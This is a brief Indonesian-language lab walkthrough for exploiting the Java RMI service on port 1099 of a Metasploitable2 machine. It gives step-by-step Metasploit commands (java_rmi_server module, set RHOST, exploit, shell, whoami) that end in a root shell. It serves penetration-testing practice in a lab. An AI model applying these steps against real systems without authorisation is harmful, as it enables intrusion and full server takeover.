Exploit Port 1099 (Java RMI)

Buka msfconsole di terminal

msfconsole

Cari modul untuk exploit Java RMI

search java_rmi_server

Disini kita gunakan modul exploit/multi/misc/java_rmi_server yang ada di list nomor 0 dari hasil pencarian

use <nomor_modul>

Tampilkan daftar parameter yang dibutuhkan di modul tersebut. Disini kita hanya perlu mengisi parameter RHOSTS saja

show options

Isi parameter RHOST dengan IP metasploitable2

set RHOST <IP_metasploitable2>

Jalankan modul tersebut. Setelah dijalankan exploit berhasil mengakses masuk ke dalam server.

exploit

Gunakan perintah sysinfo untuk melihat versi sistem operasi server. Ketik perintah shell untuk masuk ke dalam shell server. Jika diketikkan perintah whoami maka kita berhasil dengan user root